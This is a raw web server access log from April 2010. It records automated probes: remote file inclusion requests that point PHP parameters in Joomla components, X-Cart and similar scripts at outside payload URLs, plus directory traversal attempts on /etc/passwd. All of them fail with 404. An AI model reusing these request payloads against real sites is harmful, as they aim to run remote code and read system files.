88.165.81.34 - - [25/Apr/2010:07:29:37 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:37 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:29:42 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:49 -0500] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:49 -0500] "GET //addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:50 -0500] "GET /logs/access_log.1264896000//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:29:50 -0500] "GET /logs/access_log.1264550400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:11 -0500] "GET /logs/access_log.1264550400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:11 -0500] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:11 -0500] "GET //addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:11 -0500] "GET /logs/access_log.1264896000//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:20 -0500] "GET /logs/access_log.1265414400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:23 -0500] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:23 -0500] "GET //addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:23 -0500] "GET /logs/access_log.1264550400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:23 -0500] "GET /logs/access_log.1264896000//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:40 -0500] "GET /logs/access_log.1265414400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:30:41 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:30:41 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:30:58 -0500] "GET /logs/access_log.1265414400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:31:03 -0500] "GET /logs/access_log.1262649600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:31:11 -0500] "GET /logs/access_log.1265414400//addons/guildbank/searcharrays.php?addonDir=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:32 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:35 -0500] "GET //zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:35 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:32:36 -0500] "GET //zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:32:36 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:32:36 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:32:36 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:39 -0500] "GET /logs/access_log.1251504000//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:40 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 306 "-""Mozilla/5.0"
88.165.81.34 - - [25/Apr/2010:07:32:42 -0500] "GET //zipndownload.php?PP_PATH=http://www.neon-drive.com/drivers/Fx29ID.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:33:28 -0500] "GET //administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 351 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:37 -0500] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:39 -0500] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:42 -0500] "GET /logs/access_log.1264723200/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:42 -0500] "GET /logs/access_log.1263168000/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:56 -0500] "GET /logs/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:56 -0500] "GET /administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:33:58 -0500] "GET /logs/access_log.1264723200/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
72.9.156.236 - - [25/Apr/2010:07:34:00 -0500] "GET /logs/access_log.1263168000/administrator/components/com_wmtportfolio/admin.wmtportfolio.php?mosConfig_absolute_path=http://www.mlboleslav.cz/camera/j1.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:34:05 -0500] "GET /logs/access_log.1262649600//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 378 "-""Mozilla/5.0"
80.179.226.44 - - [25/Apr/2010:07:34:05 -0500] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.pointcominfo.com/phpBB2/id1.txt? HTTP/1.1" 404 356 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:07:34:07 -0500] "GET //admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 287 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:07:34:07 -0500] "GET /logs//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 292 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:07:34:07 -0500] "GET /logs/access_log.1262995200//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
66.221.63.33 - - [25/Apr/2010:07:34:08 -0500] "GET /logs/access_log.1263859200//admin/auth.php?xcart_dir=http://phamsight.com/docs/images/head?? HTTP/1.0" 404 314 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:34:23 -0500] "GET //zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:34:23 -0500] "GET /logs//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:34:23 -0500] "GET /logs/access_log.1263168000//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
72.46.157.102 - - [25/Apr/2010:07:34:23 -0500] "GET /logs/access_log.1264636800//zipndownload.php?PP_PATH=http://www.katalog.artykul.iswift.eu/img//fx29id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:34:53 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:34:53 -0500] "GET /logs/access_log.1264291200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:34:53 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:35:11 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:35:11 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:35:11 -0500] "GET /logs/access_log.1264291200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
67.195.112.180 - - [25/Apr/2010:07:36:29 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [25/Apr/2010:07:36:29 -0500] "GET /?D=D HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [25/Apr/2010:07:37:09 -0500] "GET /logs/access_log.1195776000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.190.102.21 - - [25/Apr/2010:07:37:44 -0500] "GET //main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:37:44 -0500] "GET /logs//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:37:44 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:14 -0500] "GET //components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:15 -0500] "GET /logs/access_log.1264291200//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:15 -0500] "GET /logs//components/com_moofaq/includes/file_includer.php?gzip=0&file=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 338 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:23 -0500] "GET /logs//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:23 -0500] "GET /logs/access_log.1219363200//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:23 -0500] "GET //db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:23 -0500] "GET /logs/access_log.1271030400//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:26 -0500] "GET //db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 291 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:26 -0500] "GET /logs/access_log.1271030400//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:26 -0500] "GET /logs//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:38:26 -0500] "GET /logs/access_log.1219363200//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:39:50 -0500] "GET /logs/access_log.1219363200%20%20//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:39:50 -0500] "GET /logs/access_log.1271030400%20%20//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:40:10 -0500] "GET /logs/access_log.1271030400%20%20//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:40:10 -0500] "GET /logs/access_log.1219363200%20%20//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
202.131.93.10 - - [25/Apr/2010:07:40:39 -0500] "GET /logs/access_log.1219622400//components/com_smf/smf.php?mosConfig_absolute_path=http://pyongwha.org/zeroboard/data/idxx.pdf?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:54 -0500] "GET /modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:54 -0500] "GET /logs/modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:54 -0500] "GET /logs/access_log.1267574400%20%20/modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:56 -0500] "GET /logs/modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:56 -0500] "GET /logs/access_log.1267574400%20%20/modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:07:42:56 -0500] "GET /modules/mod_calendar.php?absolute_path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:07:47:13 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
195.216.234.1 - - [25/Apr/2010:07:47:14 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 5.0; Mac_PowerPC)"
195.216.234.1 - - [25/Apr/2010:07:47:14 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
213.189.224.16 - - [25/Apr/2010:07:47:14 -0500] "GET /logs/access_log.1212451200//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:47:14 -0500] "GET /logs/access_log.1265760000//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
72.52.203.55 - - [25/Apr/2010:07:47:15 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
72.52.203.55 - - [25/Apr/2010:07:47:15 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
72.52.203.55 - - [25/Apr/2010:07:47:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.216.234.1 - - [25/Apr/2010:07:47:26 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
69.57.164.32 - - [25/Apr/2010:07:47:27 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:07:47:27 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
204.14.3.162 - - [25/Apr/2010:07:47:27 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
204.14.3.162 - - [25/Apr/2010:07:47:28 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
69.57.164.32 - - [25/Apr/2010:07:47:28 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
204.14.3.162 - - [25/Apr/2010:07:47:28 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
121.190.102.21 - - [25/Apr/2010:07:47:31 -0500] "GET //main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:47:31 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:47:31 -0500] "GET /logs//main.php?sayfa=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
204.14.3.162 - - [25/Apr/2010:07:47:31 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
72.52.203.55 - - [25/Apr/2010:07:47:33 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:07:47:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck"
87.106.42.197 - - [25/Apr/2010:07:48:15 -0500] "GET /logs/access_log.1212451200/index.php?mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:07:48:15 -0500] "GET /index.php?mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
87.106.42.197 - - [25/Apr/2010:07:48:15 -0500] "GET /logs/index.php?mosConfig.absolute.path=http://www.intoy1004.co.kr/bbs/README.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
121.190.102.21 - - [25/Apr/2010:07:50:12 -0500] "GET //main.php?sayfa=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:50:12 -0500] "GET /logs/access_log.1219363200%20%20//main.php?sayfa=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:07:50:12 -0500] "GET /logs//main.php?sayfa=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:51:26 -0500] "GET /logs/access_log.1212451200//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:07:51:26 -0500] "GET /logs/access_log.1265760000//db.php?path_local=http://come.kr/calendar315/plan/id1.txt??? HTTP/1.1" 404 318 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:35 -0500] "GET /logs/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:35 -0500] "GET /logs/access_log.1219708800%20%20/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:35 -0500] "GET /config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:36 -0500] "GET /config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:36 -0500] "GET /logs/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:51:36 -0500] "GET /logs/access_log.1219708800%20%20/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:04 -0500] "GET /config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:04 -0500] "GET /logs/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:04 -0500] "GET /logs/access_log.1219708800%20%20/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:28 -0500] "GET /config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:28 -0500] "GET /logs/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
67.222.152.66 - - [25/Apr/2010:07:52:28 -0500] "GET /logs/access_log.1219708800%20%20/config.php?inc_dir=http://telleriasnunez.com/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.52.203.55 - - [25/Apr/2010:07:53:08 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
